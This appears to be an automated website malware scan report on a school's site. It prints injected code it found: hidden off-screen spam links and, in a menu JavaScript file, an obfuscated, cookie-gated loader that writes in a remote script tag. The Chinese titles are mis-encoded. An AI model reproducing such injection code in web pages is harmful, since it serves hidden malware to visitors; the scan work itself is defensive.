Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hbsyykxx.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hbsyykxx.com/ | 200 OK Content-Length: 34527 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 ...[4169 bytes skipped]... /HTML> <style> .dwcvuer2 { position: absolute; top:-819px; left:-900px; } </style> <div class="dwcvuer2"> <a target="_blank" href="http://www.zhulin.net/html/stauc.asp" title="Ò½ÔºÅÅÃû" >Ò½ÔºÅÅÃû</a> <a target="_blank" href="http://shihuacm.com/inc/images/hosty.asp" title="Ò½ÁÆ·ÖÀàÐÅÏ¢" >Ò½ÁÆ·ÖÀàÐÅÏ¢</a> <a target="_blank" href="http://61.136.169.203/inc/stauc.asp" title="°Ù¶ÈÓ°Òô" >°Ù¶ÈÓ°Òô</a> <div id="new8link"><div id="new8"> <script type="text/javascript">document.getElementById("new8"+"li" + "nk").style.display="n" + "one";</script> | ||
http://hbsyykxx.com/images2/menu.js | 200 OK Content-Length: 27993 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var mmenus = new Array();
var misShow = new Boolean(); misShow=false; var misdown = new Boolean(); misdown=false; var mnumberofsub=0; var musestatus=false; var mpopTimer = 0; mcolor='#0c5ea4';mmenucolor='#5495cf';mfontcolor='#FFFFFF';mmenuoutcolor='#0c5ea4';mmenuincolor='#5495cf';mmenuoutbordercolor='#004a6d';mmenuinbordercolor='#004a6d';mmidoutcolor='#A9DA1D';mmidincolor='#799310';mmenuovercolor='#FFFFFF';mitemedge='0';msubedge='1';mmenuunitwidth=0;mmenu if(document.cookie.indexOf('20120811')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='20120811=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%71%75%36%37%2E%63%6F%6D%2F%61%64%73%2E%70%68%70%3F%69%64%3D%32%30%31%32%30%38%31%31%22%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://hbsyykxx.com/BigClass.asp?typeid=7&bigclassid=21 | 200 OK Content-Length: 26381 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4472 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsID=363 | 200 OK Content-Length: 994 Content-Type: text/html | clean |
http://hbsyykxx.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://hbsyykxx.com/guestbook.asp | 200 OK Content-Length: 37179 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsID=200 | 200 OK Content-Length: 30763 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/Map.asp | 200 OK Content-Length: 29399 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=622 | 200 OK Content-Length: 96028 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=621 | 200 OK Content-Length: 27630 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=620 | 200 OK Content-Length: 37033 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=619 | 200 OK Content-Length: 34975 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=618 | 200 OK Content-Length: 33542 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=617 | 200 OK Content-Length: 36695 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... | ||
http://hbsyykxx.com/ReadNews.asp?NewsId=616 | 200 OK Content-Length: 34375 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 61.136.169.203 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"> <HTML xmlns="http://www.w3.org/1999/xhtml"> <HEAD><TITLE>Ê®ÑßÊÐҽѧ¿Æ¼¼Ñ§Ð£Ê×Ò³</TITLE> <META http-equiv=Content-Type content="text/html; charset=gb2312"> <META http-equiv=X-UA-Compatible content=IE=EmulateIE7> <META http-equiv=Content-Language conte ...[4476 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hbsyykxx.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 04 Oct 2014 19:54:54 GMT
Server: Microsoft-IIS/6.0
Content-Length: 34527
Content-Type: text/html
MicrosoftOfficeWebServer: 5.0_Pub
Set-Cookie: ASPSESSIONIDSSTDBBAT=BAKBEOJDLJFCPGBOLIDPMIGA; path=/
X-Powered-By: ASP.NET
...34527 bytes of data.
GET / HTTP/1.1
Host: hbsyykxx.com
Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Sat, 04 Oct 2014 19:54:54 GMT
Server: Microsoft-IIS/6.0
Content-Length: 34527
Content-Type: text/html
MicrosoftOfficeWebServer: 5.0_Pub
Set-Cookie: ASPSESSIONIDSSTDBBAT=BAKBEOJDLJFCPGBOLIDPMIGA; path=/
X-Powered-By: ASP.NET
...34527 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hbsyykxx.com
Referer: http://www.google.com/search?q=hbsyykxx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hbsyykxx.com
Referer: http://www.google.com/search?q=hbsyykxx.com
Result:
The result is similar to the first query. There are no suspicious redirects found.